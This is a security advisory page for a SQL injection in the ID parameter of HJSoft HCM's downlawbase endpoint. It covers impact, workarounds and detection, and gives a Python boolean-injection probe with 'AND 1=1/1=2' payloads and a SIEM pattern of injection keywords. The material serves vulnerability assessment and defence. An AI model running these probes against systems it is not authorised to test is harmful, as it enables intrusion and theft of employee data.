CVE-2025-10197
📋 TL;DR
This CVE describes a SQL injection vulnerability in HJSoft HCM Human Resources Management System (宏景HCM). The ID parameter of the /templates/attestation/../../selfservice/lawresource/downlawbase endpoint reaches a database query without proper sanitisation, so a remote attacker can manipulate it to inject arbitrary SQL. Organizations running affected versions are exposed to theft of HR data and, depending on the privileges of the application's database account, to further compromise of the database host.
💻 Affected Systems
- HJSoft HCM Human Resources Management System
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test whether the vulnerability is exploitable in your environment, against an instance you are authorised to test (ideally a non-production copy)
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete database compromise leading to theft of sensitive HR data (employee records, salaries, personal information); where the application's database account holds elevated privileges, takeover of the database server and lateral movement within the network.
Likely Case
Data exfiltration of HR information, potential credential theft, and database manipulation.
If Mitigated
Limited impact due to proper input validation, parameterized queries, and network segmentation preventing database access.
🎯 Exploit Status
Exploit details are publicly available on GitHub. Remote exploitation is possible without authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
Contact HJSoft for patch information. No official patch or advisory has been released: the vendor was contacted about the disclosure but did not respond.
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rules
Implement WAF rules to block SQL injection patterns targeting the vulnerable endpoint
Network Access Control
Restrict access to the vulnerable endpoint using network ACLs or firewall rules
🧯 If You Can't Patch
- Input validation and parameterized queries in the application code are the real fix, but HJSoft HCM is a vendor product, so this is HJSoft's change to make; if you have a customisation layer or reverse proxy in front of the application, reject ID values that are not well-formed before they reach the endpoint
- Deploy a web application firewall with SQL injection protection rules; treat it as a stopgap, since encoded or obfuscated payloads can slip past signature rules
🔍 How to Verify
Check if Vulnerable:
Test the endpoint /templates/attestation/../../selfservice/lawresource/downlawbase with SQL injection payloads in the ID parameter, for example a pair of true/false boolean conditions, against an authorised and ideally non-production instance. A response that differs between the two conditions, or SQL error text in the response, indicates the parameter reaches the query unsanitised. The disclosed path contains ../ segments, so also test the normalised path /selfservice/lawresource/downlawbase, which is what the segments collapse to.
Check Version:
Check HJSoft HCM version in administration panel or configuration files
Verify Fix Applied:
Re-run the same probes after the fix: boolean-conditioned ID values should no longer change the response, SQL error text should not appear, and malformed ID values should be rejected before they reach the database
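The boolean-based differential check described above, written out as an added example (not code from this page, the public PoC, or HJSoft). It assumes the endpoint lives at /selfservice/lawresource/downlawbase below a base URL you supply, that the ID parameter is used unquoted (numeric context) in the query, and that `known_id` is an ID that normally returns a document; if the context is quoted the probes simply produce no difference, which the verdict reports as inconclusive rather than fixed. The HTTP transport is an injected `fetch(url) -> (status, body)` callable, so the decision logic is exercised offline against two constructed fake servers. Run it only against systems you are authorised to test.

```python
"""Boolean-based differential check for the downlawbase ID parameter.

Added example for this page; not code from the page, the PoC or HJSoft.
Assumptions: endpoint path below BASE_URL, numeric (unquoted) ID context,
and a known_id that returns a normal document. Authorised testing only.
"""
import urllib.error
import urllib.request
from urllib.parse import parse_qs, quote, urlsplit

ENDPOINT = "/selfservice/lawresource/downlawbase"

# Verdict strings returned by probe().
VULNERABLE = "likely vulnerable: true/false conditions change the response"
NO_DIFFERENCE = "no boolean difference: fixed, filtered, or not a numeric context"
REJECTED = "probe altered the response: validation, WAF, or a quoted context"


def build_url(base_url, id_value):
    """Request URL for a given (decoded) ID value, percent-encoded once."""
    return f"{base_url.rstrip('/')}{ENDPOINT}?ID={quote(id_value, safe='')}"


def signature(response):
    """Status and body length; tokens/timestamps make byte equality fragile."""
    status, body = response
    return status, len(body)


def probe(fetch, base_url, known_id="1"):
    """Compare a baseline request with AND 1=1 / AND 1=2 variants of the ID."""
    baseline = signature(fetch(build_url(base_url, known_id)))
    true_cond = signature(fetch(build_url(base_url, f"{known_id} AND 1=1")))
    false_cond = signature(fetch(build_url(base_url, f"{known_id} AND 1=2")))
    if true_cond == baseline and false_cond != baseline:
        return VULNERABLE
    if true_cond == baseline and false_cond == baseline:
        return NO_DIFFERENCE
    return REJECTED


def http_fetch(url, timeout=10):
    """Real transport: returns (status, body) and keeps 4xx/5xx as data."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


# --- constructed fake servers for offline demonstration -------------------

def _id_param(url):
    return parse_qs(urlsplit(url).query).get("ID", [""])[0].lower()


def fake_vulnerable_fetch(url):
    """Emulates an unparameterised numeric query: ' AND 1=2' yields no row."""
    if "and 1=2" in _id_param(url):
        return 200, b""
    return 200, b"%PDF-1.4 ... law document ..."


def fake_fixed_fetch(url):
    """Emulates input validation: anything but digits is rejected."""
    if not _id_param(url).isdigit():
        return 400, b"invalid id"
    return 200, b"%PDF-1.4 ... law document ..."


if __name__ == "__main__":
    BASE_URL = "http://hcm.example.internal"  # placeholder host (assumption)
    print("fake vulnerable:", probe(fake_vulnerable_fetch, BASE_URL))
    print("fake fixed:", probe(fake_fixed_fetch, BASE_URL))
    # Against a real, authorised host: probe(http_fetch, BASE_URL, known_id="1023")
```

The check compares three requests rather than firing a single `' OR 1=1` or UNION payload: it reads nothing from the database and does not depend on error messages, which a WAF or a custom error page may hide. A REJECTED verdict is not proof of a fix; inspect the response for SQL error text, since a quoted injection context produces the same pattern.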
📡 Detection & Monitoring
Log Indicators:
- Unusual queries in database audit logs issued by the HCM application's database account (web server logs do not record SQL)
- SQL syntax errors or repeated database exceptions in the application logs, which a failed injection attempt typically leaves behind
- Access to the downlawbase endpoint with suspicious parameters
Network Indicators:
- SQL error messages in HTTP responses
- Unusual database connection patterns from web servers
SIEM Query (pseudo-syntax; match case-insensitively against the URL-decoded query string, otherwise %27/%20-encoded payloads slip past the literal patterns, and keep the wildcard around downlawbase so both the ../ form and the normalised path match):
source="web_logs" AND uri="*downlawbase*" AND param="*ID=*" AND (content="*'*" OR content="*' OR *" OR content="*UNION*" OR content="*SELECT*" OR content="*AND 1=*" OR content="*SLEEP*" OR content="*WAITFOR*")
🔗 References
- https://github.com/eeeeeekkkkkkkk/POC/blob/main/%E5%AE%8F%E6%99%AFHCM%20%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownlawbase%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://vuldb.com/?ctiid.323236
- https://vuldb.com/?id.323236
- https://vuldb.com/?submit.639745